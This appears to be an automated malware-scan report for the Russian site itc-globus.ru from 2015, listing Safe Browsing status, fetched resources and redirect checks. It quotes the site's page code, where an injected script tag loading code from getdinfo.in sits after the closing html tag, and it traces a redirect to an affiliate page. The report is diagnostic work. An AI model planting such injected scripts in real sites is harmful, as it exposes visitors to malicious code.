Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=itc-globus.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://itc-globus.ru/ | 200 OK Content-Length: 14707 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: getdinfo.in ...[4862 bytes skipped]... " width="88" alt="Рейтинг@Mail.ru"/></a></noscript> <script language="JavaScript" type="text/javascript"><!-- if(11<js)d.write('--'+'>')//--></script><!--/COUNTER--> </span></font></div> </div> </body> </html> <script src="http://getdinfo.in/js.js"></script> | ||
http://getdinfo.in/js.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/./images/www-widgetapi.js | 200 OK Content-Length: 23562 Content-Type: text/javascript | clean |
http://getdinfo.in/./images/jquery-1.8.3.min.js | 200 OK Content-Length: 93636 Content-Type: text/javascript | clean |
http://getdinfo.in/./images/jquery.fancybox.pack.js | 200 OK Content-Length: 23135 Content-Type: text/javascript | clean |
http://getdinfo.in/./images/jquery.mousewheel-3.0.6.pack.js | 200 OK Content-Length: 1384 Content-Type: text/javascript | clean |
http://getdinfo.in/./images/player_api | 200 OK Content-Length: 717 Content-Type: text/plain | clean |
http://getdinfo.in/test404page.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/./images/scripts.js | 200 OK Content-Length: 622 Content-Type: text/javascript | clean |
http://getdinfo.in/ndex.php | HTTP/1.1 302 Found Connection: close Date: Thu, 22 Jan 2015 13:23:26 GMT Location: http://u-bot.ru/reg.php?reg_lang=ru&aff_id=1&aff_sub=mahakteddoottruddeell181ddeell42 Server: Apache/2.2.15 (CentOS) Content-Length: 3 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | clean |
http://u-bot.ru/reg.php?reg_lang=ru&aff_id=1&aff_sub=mahakteddoottruddeell181ddeell42 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 22 Jan 2015 13:24:47 GMT Location: reg.php Server: cloudflare-nginx Content-Type: text/html CF-RAY: 1acc12e3b8ff05c3-WAW Set-Cookie: __cfduid=df9222362094a2897e12e722cda6403b91421933087; expires=Fri, 22-Jan-16 13:24:47 GMT; path=/; domain=.u-bot.ru; HttpOnly Set-Cookie: lang=ru; expires=Sun, 22-Feb-2015 13:25:15 GMT Set-Cookie: aff_id=1; expires=Sat, 21-Feb-2015 13:25:15 GMT Set-Cookie: aff_sub=mahakteddoottruddeell181ddeell42; expires=Sat, 21-Feb-2015 13:25:15 GMT X-Powered-By: PHP/5.3.3 | clean |
http://u-bot.ru/reg.php | 200 OK Content-Length: 190691 Content-Type: text/html | clean |
http://u-bot.ru/ubot_media/js/jquery-1.8.3.min.js | 200 OK Content-Length: 93637 Content-Type: application/x-javascript | clean |
http://getdinfo.in/ubot_media/js/jquery.bxslider.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/ubot_media/js/./images/www-widgetapi.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/ubot_media/js/./images/./images/www-widgetapi.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
http://getdinfo.in/ubot_media/js/./images/./images/./images/www-widgetapi.js | 200 OK Content-Length: 21797 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: itc-globus.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 13:23:48 GMT
Server: nginx/0.6.34
Content-Language: ru
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: itc-globus.ru
Referer: http://www.google.com/search?q=itc-globus.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.